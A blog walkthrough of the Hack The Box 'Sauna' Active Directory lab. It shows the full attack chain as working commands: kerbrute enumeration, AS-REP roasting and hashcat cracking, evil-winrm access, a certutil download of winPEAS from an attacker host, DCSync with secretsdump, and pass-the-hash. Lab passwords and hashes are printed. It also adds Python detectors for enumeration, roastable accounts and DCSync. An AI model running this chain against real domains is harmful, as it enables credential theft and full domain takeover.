DEV Community

Iftikhar Huseynov

Sauna CTF HTB

Hi, welcome to my page. Today we are going to solve the Sauna CTF on Hack The Box. This box is about Active Directory, which is an important topic.

Enumeration
```
nmap -sV -sC 10.129.95.180
Starting Nmap 7.98 ( https://nmap.org ) at 2026-07-03 13:16 -0400
Nmap scan report for 10.129.95.180
Host is up (0.21s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-07-04 00:16:58Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2026-07-04T00:17:20
|_  start_date: N/A
|_clock-skew: 6h59m50s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
```

As we can see, we have LDAP, WinRM (5985), SMB, HTTP, RPC and several more ports open.

RPC port

```
rpcclient -U "" -N 10.129.95.180
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> ^C
```

We can't enumerate over RPC without authentication.

SMB port

```
smbclient -L //10.129.95.180
Password for [WORKGROUP\root]:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

Same thing.

LDAP
Ports 88 (Kerberos) and 636 (LDAPS) are open, so we can use ldapsearch for domain enumeration. Let's start.

```
ldapsearch -x -H ldap://10.129.95.180 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#

#
dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
```

The domain is egotistical-bank.local. Nothing else interesting here.

KERBEROS
Port 88 is open, so we can use the kerbrute tool to enumerate valid usernames. I'm using SecLists for usernames, but any username wordlist will do.

```
./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop

2026/07/03 13:31:29 >  Using KDC(s):
2026/07/03 13:31:29 >   10.129.95.180:88

2026/07/03 13:32:09 >  [+] VALID USERNAME:       administrator@egotistical-bank.local
2026/07/03 13:35:45 >  [+] VALID USERNAME:       hsmith@egotistical-bank.local
2026/07/03 13:36:30 >  [+] VALID USERNAME:       Administrator@egotistical-bank.local
2026/07/03 13:38:47 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local
2026/07/03 13:58:42 >  [+] VALID USERNAME:       Fsmith@egotistical-bank.local
```

We found 3 users (Kerberos principal names are case-insensitive, so the capitalised duplicates are the same accounts).
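From the defender's side, the enumeration above is visible on the domain controller: each kerbrute guess is an AS-REQ, and the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN (0x6) for names that do not exist and KDC_ERR_PREAUTH_REQUIRED (0x19) for names that do, which is what produces the "VALID USERNAME" lines. Both outcomes land in Windows Security event 4768. The following Python is an added example for this write-up, not kerbrute's code; it assumes the 4768 events have already been parsed into dicts with the fields shown, and the sample events are constructed.

```python
"""Spot Kerberos username enumeration in Windows Security event 4768 data.

Added example for this write-up, not kerbrute's own code. Events are assumed
to be parsed into dicts (time, src_ip, user, code); the samples are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # no such account -> a guessed name
KDC_ERR_PREAUTH_REQUIRED = "0x19"     # account exists, pre-auth needed

# Constructed sample 4768 events: 10.10.14.5 walks a wordlist, 10.129.95.7 is a normal client.
SAMPLE_EVENTS = [
    {"time": "2026-07-03T13:31:29", "src_ip": "10.10.14.5", "user": "aaron", "code": "0x6"},
    {"time": "2026-07-03T13:31:29", "src_ip": "10.10.14.5", "user": "abby", "code": "0x6"},
    {"time": "2026-07-03T13:31:30", "src_ip": "10.10.14.5", "user": "adam", "code": "0x6"},
    {"time": "2026-07-03T13:31:30", "src_ip": "10.10.14.5", "user": "admin", "code": "0x6"},
    {"time": "2026-07-03T13:31:31", "src_ip": "10.10.14.5", "user": "administrator", "code": "0x19"},
    {"time": "2026-07-03T13:31:31", "src_ip": "10.10.14.5", "user": "alex", "code": "0x6"},
    {"time": "2026-07-03T13:31:32", "src_ip": "10.10.14.5", "user": "alice", "code": "0x6"},
    {"time": "2026-07-03T13:40:00", "src_ip": "10.129.95.7", "user": "hsmtih", "code": "0x6"},  # one typo, benign
    {"time": "2026-07-03T13:40:05", "src_ip": "10.129.95.7", "user": "hsmith", "code": "0x0"},
]


def find_enumerators(events, window=timedelta(minutes=5), min_distinct=5):
    """Return {src_ip: {"unknown_names": n, "window_start": iso}} for every source
    that requested TGTs for at least `min_distinct` different non-existent
    principals inside any `window`-long span."""
    per_src = defaultdict(list)
    for ev in events:
        if ev["code"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            per_src[ev["src_ip"]].append((datetime.fromisoformat(ev["time"]), ev["user"].lower()))

    hits = {}
    for src, items in per_src.items():
        items.sort()
        best = None
        start = 0
        for end in range(len(items)):
            # shrink the window from the left until it spans at most `window`
            while items[end][0] - items[start][0] > window:
                start += 1
            names = {name for _, name in items[start:end + 1]}
            if len(names) >= min_distinct and (best is None or len(names) > best[0]):
                best = (len(names), items[start][0].isoformat())
        if best:
            hits[src] = {"unknown_names": best[0], "window_start": best[1]}
    return hits


def confirmed_names(events, src_ip):
    """Accounts the suspected enumerator confirmed exist (KDC answered PREAUTH_REQUIRED).
    These are the ones to review for disabled pre-authentication next."""
    return sorted({ev["user"].lower() for ev in events
                   if ev["src_ip"] == src_ip and ev["code"] == KDC_ERR_PREAUTH_REQUIRED})


if __name__ == "__main__":
    for src, info in find_enumerators(SAMPLE_EVENTS).items():
        print(f"{src}: {info['unknown_names']} unknown names from {info['window_start']}, "
              f"confirmed={confirmed_names(SAMPLE_EVENTS, src)}")
```

The single typo from 10.129.95.7 stays under the threshold, while the wordlist run from 10.10.14.5 is flagged together with the account name it confirmed. Thresholds are deliberately parameters: tune them to the normal failure rate of your own domain.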

AS-REP ROASTING
For these users we can use the Impacket script GetNPUsers.py. It asks the KDC for an AS-REP on behalf of each user; accounts with the DONT_REQUIRE_PREAUTH flag set get one back without a password, and the encrypted part can then be cracked offline.

```
GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$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
```

We got fsmith’s hash.
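The only thing that made fsmith roastable is one bit in the userAccountControl attribute (UF_DONT_REQUIRE_PREAUTH, 0x400000); the two "doesn't have UF_DONT_REQUIRE_PREAUTH set" lines are Impacket reporting that bit clear. The Python below is an added example for this write-up, not Impacket's code: it audits a set of accounts for that bit and parses the hashcat-format line GetNPUsers.py writes. The bit values are the documented userAccountControl flags; the sample accounts and the sample hash line (fake checksum and ciphertext) are constructed, not taken from the lab.

```python
"""userAccountControl audit for AS-REP roastable accounts, plus a parser for the
hashcat $krb5asrep$ line format.

Added example for this write-up, not Impacket's code. Sample data is constructed.
"""
import re

# userAccountControl bits (LDAP attribute on the user object); UF_* names as Impacket prints them.
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

UAC_NAMES = {
    UF_ACCOUNTDISABLE: "ACCOUNTDISABLE",
    UF_NORMAL_ACCOUNT: "NORMAL_ACCOUNT",
    UF_DONT_EXPIRE_PASSWD: "DONT_EXPIRE_PASSWD",
    UF_DONT_REQUIRE_PREAUTH: "DONT_REQUIRE_PREAUTH",
}


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_NAMES.items()) if value & bit]


def asrep_roastable(value):
    """True for an enabled account with pre-authentication disabled: the KDC will
    hand its AS-REP to anyone, so the password is exposed to offline cracking."""
    return bool(value & UF_DONT_REQUIRE_PREAUTH) and not value & UF_ACCOUNTDISABLE


def audit_accounts(accounts):
    """accounts: {sAMAccountName: userAccountControl}. Returns the roastable names."""
    return sorted(name for name, uac in accounts.items() if asrep_roastable(uac))


# $krb5asrep$<etype>$<user>@<REALM>:<16-byte checksum hex>$<encrypted part hex>
ASREP_LINE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+)"
    r":(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)


def parse_asrep_line(line):
    """Split a hashcat AS-REP line into its fields. etype 23 is RC4-HMAC,
    which is the encryption type hashcat mode 18200 expects."""
    m = ASREP_LINE.match(line.strip())
    if not m:
        raise ValueError("not a hashcat $krb5asrep$ line")
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])
    return fields


# Constructed sample values for the demo.
SAMPLE_ACCOUNTS = {
    "Administrator": 0x10200,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    "hsmith": 0x10200,
    "fsmith": 0x410200,         # ... | DONT_REQUIRE_PREAUTH -> roastable
    "olduser": 0x410202,        # same, but ACCOUNTDISABLE -> KDC refuses the request anyway
}
SAMPLE_LINE = ("$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:"
               + "ab" * 16 + "$" + "cd" * 24)   # fake checksum and ciphertext

if __name__ == "__main__":
    print("roastable:", audit_accounts(SAMPLE_ACCOUNTS))
    print("fsmith flags:", decode_uac(SAMPLE_ACCOUNTS["fsmith"]))
    print("parsed:", parse_asrep_line(SAMPLE_LINE))
```

Pulling userAccountControl for every user over LDAP and feeding it to audit_accounts is the cheap way to find this exposure before someone else does; the fix is simply clearing the flag on the account.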

Cracking the hash
Hashcat helps us crack this hash (mode 18200 is Kerberos 5 AS-REP, etype 23).

```
hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$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:Thestrokes23
```

We found fsmith’s password.

Gaining access with evil-winrm | PORT 5985

The general syntax is:

```
evil-winrm -i <ip> -u <username> -p <password>
```

```
evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23

Evil-WinRM shell v3.9

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/3/2026   5:14 PM             34 user.txt


*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
*******
```

We got user.txt in the Desktop directory.

Privilege Escalation
First, we upload winPEAS to the victim machine to look for privilege escalation paths.

On attacker machine

Make sure you are in the directory that contains winPEAS.

```
python3 -m http.server 80
```

On victim machine

```
certutil -urlcache -split -f http://<ATTACKER_IP>:80/winPEAS.exe winPEAS.exe
```

We can then run winPEAS with `.\winPEAS.exe`.

```
Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

And there it is: AutoLogon credentials for svc_loanmanager.

BloodHound

Take a look at BloodHound, and we can understand what the loan manager account can do. It has 3 permissions on the domain object: GetChangesAll, DCSync, GetChanges. These are the directory replication rights, so the account can DCSync, i.e. pull password hashes from the domain controller. Note that the actual domain account is svc_loanmgr (the name used in the secretsdump command below), not svc_loanmanager as the AutoLogon entry showed.
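The GetChanges / GetChangesAll rights BloodHound shows are control-access rights with fixed GUIDs, and when a principal exercises them the domain controller logs Security event 4662 on the domain object with access mask 0x100 (Control Access) and those GUIDs in the Properties field. That makes DCSync one of the easier AD attacks to detect: anything other than a DC machine account (or an allow-listed sync service) using these rights is an alert. The Python below is an added example for this write-up, not BloodHound's or Impacket's code; it assumes the 4662 events are already parsed into dicts, and the sample events, the allow-list and the placeholder non-replication GUID are constructed.

```python
"""Flag DCSync-style replication in Windows Security event 4662.

Added example for this write-up, not BloodHound's or Impacket's code. Events are
assumed to be parsed into dicts; the samples and the allow-list are constructed.
"""

# Control-access right GUIDs for directory replication (schema-defined, stable values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # access mask bit for "Control Access" in 4662

# Principals that legitimately replicate: DC machine accounts plus any allow-listed
# sync service. Constructed for this example; SAUNA is the DC hostname from the scan.
EXPECTED_REPLICATORS = {"SAUNA$"}

# Constructed 4662 events (Properties holds the GUIDs as they appear in the event).
SAMPLE_4662 = [
    {"subject": "EGOTISTICAL-BANK\\SAUNA$", "object_type": "domainDNS",
     "access_mask": "0x100",
     "properties": ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"subject": "EGOTISTICAL-BANK\\svc_loanmgr", "object_type": "domainDNS",
     "access_mask": "0x100",
     "properties": ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]},
    {"subject": "EGOTISTICAL-BANK\\hsmith", "object_type": "user",
     "access_mask": "0x10",   # a plain property write, not control access
     "properties": ["00000000-0000-0000-0000-000000000000"]},  # placeholder, not a replication GUID
]


def replication_rights_used(event):
    """Names of the replication rights exercised by one 4662 event, or [] if none."""
    if int(event["access_mask"], 16) & CONTROL_ACCESS == 0:
        return []
    guids = (p.lower() for p in event["properties"])
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)


def find_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Replication requests from principals that are not expected to replicate."""
    allowed = {e.upper() for e in expected}
    alerts = []
    for ev in events:
        rights = replication_rights_used(ev)
        if not rights:
            continue
        account = ev["subject"].split("\\")[-1]   # strip the DOMAIN\ prefix
        if account.upper() in allowed:
            continue
        alerts.append({"account": account, "rights": rights})
    return alerts


if __name__ == "__main__":
    for alert in find_dcsync(SAMPLE_4662):
        print(f"DCSync suspected: {alert['account']} used {', '.join(alert['rights'])}")
```

The DC's own replication passes silently, the unrelated property write is ignored, and the service account's use of both Get-Changes rights is reported. The same GUIDs are what you would look for in the domain object's ACL to remove the permission in the first place.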

We use secretsdump.py to pull the Administrator hash.

```
secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
```
We have the hash, but first we should make sure that we can log in with it. We use crackmapexec to prove it (pass-the-hash over SMB).

```
crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
SMB         10.129.95.180   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.95.180   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)
```

Yeppp, we can use this hash to log in!

ROOT FLAG

```
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 Administrator@10.129.95.180

C:\Users> cd Administrator

C:\Users\Administrator> cd Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

07/14/2021  03:35 PM    <DIR>          .
07/14/2021  03:35 PM    <DIR>          ..
07/03/2026  05:14 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,812,263,936 bytes free

C:\Users\Administrator\Desktop> type root.txt
*********
```
BINGOOO!!!! We got the root flag. Stay safe and goodbye.
